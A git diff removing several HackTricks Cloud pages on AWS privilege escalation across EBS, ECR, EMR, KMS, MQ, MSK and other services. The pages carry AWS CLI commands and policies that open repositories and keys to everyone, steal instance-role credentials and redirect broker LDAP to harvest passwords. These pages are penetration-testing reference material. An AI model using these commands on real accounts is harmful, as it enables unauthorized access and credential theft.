- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md deleted file mode 100644 index 29cc69d95..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - EBS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EBS - -### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` - -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: - -{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %} -[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) -{% endcontent-ref %} - -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` - -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). - -### **`ec2:CreateSnapshot`** - -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. - -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md deleted file mode 100644 index 9a84a0d29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ /dev/null @@ -1,136 +0,0 @@ -# AWS - ECR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` - -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. - -For more info on how to download images: - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. - -### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` - -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. - -To learn how to upload a new image/update one, check: - -{% content-ref url="../aws-services/aws-eks-enum.md" %} -[aws-eks-enum.md](../aws-services/aws-eks-enum.md) -{% endcontent-ref %} - -### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` - -Like the previous section, but for public repositories. - -### `ecr:SetRepositoryPolicy` - -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. - -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -Contents of `my-policy.json`: - -```json -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -### `ecr-public:SetRepositoryPolicy` - -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. - -{% code overflow="wrap" %} -```bash -bashCopy code# Create a JSON file with the malicious public repository policy -echo '{ - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "MaliciousPublicRepoPolicy", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr-public:GetDownloadUrlForLayer", - "ecr-public:BatchGetImage", - "ecr-public:BatchCheckLayerAvailability", - "ecr-public:PutImage", - "ecr-public:InitiateLayerUpload", - "ecr-public:UploadLayerPart", - "ecr-public:CompleteLayerUpload", - "ecr-public:DeleteRepositoryPolicy" - ] - } - ] -}' > malicious_public_repo_policy.json - -# Apply the malicious public repository policy to the ECR Public repository -aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json -``` -{% endcode %} - -**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. - -### `ecr:PutRegistryPolicy` - -An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. - -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md deleted file mode 100644 index acad83823..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ /dev/null @@ -1,92 +0,0 @@ -# AWS - EMR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -More **info about EMR** in: - -{% content-ref url="../aws-services/aws-emr-enum.md" %} -[aws-emr-enum.md](../aws-services/aws-emr-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, `elasticmapreduce:RunJobFlow` - -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - -```bash -# Import EC2 ssh key (you will need extra permissions for this) -ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" -chmod 400 /tmp/sshkey -base64 /tmp/sshkey.pub > /tmp/pub.key -aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key - - -aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc - -# Wait 1min and connect via ssh to an EC2 instance of the cluster) -aws emr describe-cluster --cluster-id -# In MasterPublicDnsName you can find the DNS to connect to the master instance -## You cna also get this info listing EC2 instances -``` - -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. - -### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` - -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -### `elasticmapreduce:OpenEditorInConsole` - -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.` -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md deleted file mode 100644 index 77979f805..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Gamelift - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `gamelift:RequestUploadCredentials` - -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - -```bash -aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 -``` - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md deleted file mode 100644 index ccd34ffa8..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ /dev/null @@ -1,154 +0,0 @@ -# AWS - KMS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more info about KMS check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) - -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - -{% code overflow="wrap" %} -```bash -aws kms list-keys -aws kms list-key-policies --key-id # Although only 1 max per key -aws kms get-key-policy --key-id --policy-name -# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") -aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json -``` -{% endcode %} - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Id" : "key-consolepolicy-3", - "Statement" : [ - { - "Sid" : "Enable IAM User Permissions", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "kms:*", - "Resource" : "*" - }, - { - "Sid" : "Allow all use", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : [ "kms:*" ], - "Resource" : "*" - } - ] -} -``` - -### `kms:CreateGrant` - -It **allows a principal to use a KMS key:** - -```bash -aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt -``` - -{% hint style="warning" %} -A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="warning" %} -Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). -{% endhint %} - -```bash -# Use the grant token in a request -aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token -``` - -Note that it's possible to list grant of keys with: - -```bash -aws kms list-grants --key-id -``` - -### `kms:CreateKey`, `kms:ReplicateKey` - -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. - -So, an attacker could abuse this to obtain privesc his access to the key and use it - -{% code overflow="wrap" %} -```bash -aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml - -{ - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` -{% endcode %} - -### `kms:Decrypt` - -This permission allows to use a key to decrypt some information.\ -For more information check: - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md deleted file mode 100644 index 3156ba72e..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - Mediapackage Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `mediapackage:RotateChannelCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -```bash -aws mediapackage rotate-channel-credentials --id -``` - -### `mediapackage:RotateIngestEndpointCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -{% code overflow="wrap" %} -```bash -aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 -``` -{% endcode %} - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md deleted file mode 100644 index 3532b180a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - MQ Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MQ - -For more information about MQ check: - -{% content-ref url="../aws-services/aws-mq-enum.md" %} -[aws-mq-enum.md](../aws-services/aws-mq-enum.md) -{% endcontent-ref %} - -### `mq:ListBrokers`, `mq:CreateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq create-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq list-users --broker-id -aws mq update-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:UpdateBroker` - -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. - -```bash -aws mq list-brokers -aws mq update-broker --broker-id --ldap-server-metadata=... -``` - -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md deleted file mode 100644 index c5a09cb29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ /dev/null @@ -1,52 +0,0 @@ -# AWS - MSK Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MSK - -For more information about MSK (Kafka) check: - -{% content-ref url="../aws-services/aws-msk-enum.md" %} -[aws-msk-enum.md](../aws-services/aws-msk-enum.md) -{% endcontent-ref %} - -### `msk:ListClusters`, `msk:UpdateSecurity` - -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - -{% code overflow="wrap" %} -```bash -aws msk --client-authentication --cluster-arn --current-version -``` -{% endcode %} - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md deleted file mode 100644 index 89b2282f2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Organizations Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
